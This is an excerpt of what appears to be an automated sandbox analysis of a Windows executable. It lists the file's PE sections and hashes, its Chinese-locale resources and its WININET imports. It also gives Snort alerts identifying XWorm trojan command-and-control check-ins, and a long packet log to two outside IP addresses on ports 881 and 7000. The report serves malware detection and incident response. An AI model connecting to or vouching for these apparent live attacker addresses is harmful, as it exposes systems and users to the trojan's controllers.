IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3f000	0x1324	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1c210	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x19000	0x150	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1743c	0x17600	ab580cddc679ae0d5b3dd834986610c2	False	0.5719522894385026	data	6.614276586524876	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x19000	0x4f70	0x5000	8e5c6b4b12873e8ba6fbdd1a148d008c	False	0.359716796875	data	4.948589515734893	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1e000	0x36a4	0x1800	500b8464eb3f810675db40ab228e1c8d	False	0.318359375	data	3.965821344741006	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x22000	0x1c748	0x1c800	a54431f5671b576c9accbe2dc593520c	False	0.27455969024122806	data	4.800983647652764	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x3f000	0x1df0	0x1e00	7db27062fec17c05f337cc9d7d915e8c	False	0.5053385416666667	data	4.988399844131618	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x223a0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	Chinese	China	0.2554878048780488
RT_ICON	0x22a08	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	Chinese	China	0.3602150537634409
RT_ICON	0x22cf0	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	Chinese	China	0.39344262295081966
RT_ICON	0x22ed8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	Chinese	China	0.4358108108108108
RT_ICON	0x23000	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Chinese	China	0.4986673773987207
RT_ICON	0x23ea8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Chinese	China	0.5888989169675091
RT_ICON	0x24750	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Chinese	China	0.548963133640553
RT_ICON	0x24e18	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Chinese	China	0.40534682080924855
RT_ICON	0x25380	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	Chinese	China	0.18236129184904767
RT_ICON	0x35ba8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	Chinese	China	0.3425838450637695
RT_ICON	0x39dd0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Chinese	China	0.3924273858921162
RT_ICON	0x3c378	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Chinese	China	0.49953095684803
RT_ICON	0x3d420	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Chinese	China	0.580327868852459
RT_ICON	0x3dda8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Chinese	China	0.6906028368794326
RT_GROUP_ICON	0x3e210	0xca	data	Chinese	China	0.6089108910891089
RT_VERSION	0x3e2dc	0x304	data	Chinese	China	0.43134715025906734
RT_MANIFEST	0x3e5e0	0x165	ASCII text, with CRLF line terminators	English	United States	0.5434173669467787

Imports

DLL

Import

KERNEL32.dll

CloseHandle, ReadFile, VirtualAlloc, GetFileSize, CreateFileA, Sleep, GetTickCount64, VirtualFree, SetEndOfFile, CreateFileW, SetStdHandle, WriteConsoleW, LoadLibraryW, IsValidLocale, InterlockedIncrement, InterlockedDecrement, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, EncodePointer, DecodePointer, GetSystemTimeAsFileTime, GetLastError, HeapFree, RaiseException, RtlUnwind, GetCommandLineA, HeapSetInformation, GetStartupInfoW, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, HeapAlloc, IsProcessorFeaturePresent, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, SetLastError, GetCurrentThreadId, GetProcAddress, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, HeapCreate, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, ExitProcess, WriteFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, GetModuleFileNameW, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW, GetLocaleInfoW, HeapReAlloc, HeapSize, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, GetProcessHeap

WININET.dll

InternetCloseHandle, InternetReadFile, InternetOpenUrlA, InternetOpenA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/02/24-19:28:04.062990	TCP	2852923	ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	49731	7000	192.168.2.4	117.41.184.33
07/02/24-19:27:07.814963	TCP	2853193	ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound	49731	7000	192.168.2.4	117.41.184.33
07/02/24-19:27:50.409497	TCP	2852874	ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2	7000	49731	117.41.184.33	192.168.2.4
07/02/24-19:28:04.061886	TCP	2852870	ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes	7000	49731	117.41.184.33	192.168.2.4
07/02/24-19:24:21.363862	TCP	2855924	ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound	49731	7000	192.168.2.4	117.41.184.33

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 19:23:58.220279932 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:58.230170965 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:58.230299950 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:58.230568886 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:58.239032984 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.166776896 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.166795969 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.166809082 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.166870117 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.166882992 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.166894913 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.166907072 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.166919947 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.166925907 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.166987896 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.167015076 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.167032003 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.167062998 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.167093992 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.171775103 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.171797037 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.171808958 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.171864033 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.171904087 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.404623985 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.404660940 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.404684067 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.404697895 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.404709101 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.404731989 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.404763937 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.404964924 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.405024052 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.405025959 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.405044079 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.405082941 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.405082941 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.405119896 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.405133963 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.405162096 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.405184031 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.405879021 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.405891895 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.405910015 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.405925989 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.405944109 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.405967951 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.406353951 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.406409979 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.406421900 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.406430006 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.406455994 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.406455994 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.406482935 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.406496048 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.406521082 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.406541109 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.407207012 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.407250881 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.407253981 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.407263994 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.407291889 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.407318115 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.407332897 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.407351971 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.407351971 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.407375097 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.409528971 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.409589052 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.504255056 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.504411936 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.642496109 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.642615080 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.642637968 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.642640114 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.642679930 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.642688990 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.642698050 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.642729044 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.642755985 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.642776966 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.642776966 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.642784119 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.642810106 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.642822981 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.642822981 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.642863989 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.642868042 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.642895937 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.642923117 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.642940998 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.642940998 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.642949104 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.642992973 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.642992973 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.643039942 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.643052101 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.643073082 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.643110991 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.643146038 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.643165112 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.643209934 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.643270016 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.643280029 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.643299103 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.643306971 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.643316031 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.643332005 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.643353939 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.643353939 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.643377066 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.643425941 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.643733025 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.643738985 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.643750906 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.643786907 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.643802881 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.643807888 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:23:59.643811941 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:23:59.643853903 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:24:07.820274115 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:24:07.943845987 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:24:07.943943024 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:24:08.244626999 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:24:08.249558926 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:24:20.415836096 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:24:20.470429897 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:24:21.363862038 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:24:21.370366096 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:24:21.688330889 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:24:21.690304995 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:24:21.695175886 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:24:34.486437082 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:24:34.492049932 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:24:34.828737020 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:24:34.830986023 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:24:34.835784912 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:24:47.611846924 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:24:47.616827965 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:24:47.942821980 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:24:47.947315931 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:24:47.952828884 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:24:50.402059078 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:24:50.454909086 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:25:00.736831903 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:25:00.741744995 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:01.060697079 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:01.062467098 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:25:01.070936918 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:04.647357941 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:25:04.647454023 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:25:13.862291098 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:25:13.867086887 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:14.422822952 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:14.423880100 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:14.423945904 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:25:14.425832033 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:25:14.430600882 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:21.461173058 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:21.461822033 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:21.461898088 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:25:21.463284016 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:21.463359118 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:25:21.464085102 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:21.464137077 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:25:26.986650944 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:25:26.991818905 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:27.311796904 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:27.315186977 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:25:27.320642948 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:27.517978907 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:25:27.523861885 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:27.920382023 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:27.922770023 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:25:27.927810907 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:40.642914057 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:25:40.647989035 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:40.965996027 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:40.970218897 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:25:40.975049019 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:47.783571005 CEST	49730	881	192.168.2.4	91.208.240.157
Jul 2, 2024 19:25:47.788878918 CEST	881	49730	91.208.240.157	192.168.2.4
Jul 2, 2024 19:25:47.892812014 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:25:47.897932053 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:48.219472885 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:48.222208023 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:25:48.231834888 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:50.412286997 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:50.501852036 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:25:53.408782005 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:25:53.642584085 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:53.642648935 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:25:53.647476912 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:53.658452034 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:25:53.663191080 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:53.893574953 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:25:53.899079084 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:53.960432053 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:53.962522984 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:25:53.967489004 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:54.211044073 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:54.213085890 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:25:54.217951059 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:54.438898087 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:54.441144943 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:25:54.446151972 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:54.446228981 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:25:54.451227903 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:54.666838884 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:54.668689966 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:25:54.674521923 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:59.174746990 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:25:59.179533958 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:59.515080929 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:25:59.519217014 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:25:59.524022102 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:26:04.502172947 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:26:04.507595062 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:26:04.839263916 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:26:04.841372013 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:26:04.850207090 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:26:17.627403975 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:26:17.633161068 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:26:17.951145887 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:26:17.953541040 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:26:17.958587885 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:26:19.955825090 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:26:19.960736036 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:26:20.278434992 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:26:20.280667067 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:26:20.285444021 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:26:20.559474945 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:26:20.611428022 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:26:33.116445065 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:26:33.121537924 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:26:33.440284967 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:26:33.539132118 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:26:33.544199944 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:26:35.518205881 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:26:35.523123026 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:26:35.549209118 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:26:35.554109097 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:26:35.841394901 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:26:35.847273111 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:26:35.852089882 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:26:36.070525885 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:26:36.078664064 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:26:36.084045887 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:26:40.752885103 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:26:40.757698059 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:26:41.086961985 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:26:41.089107990 CEST	49731	7000	192.168.2.4	117.41.184.33
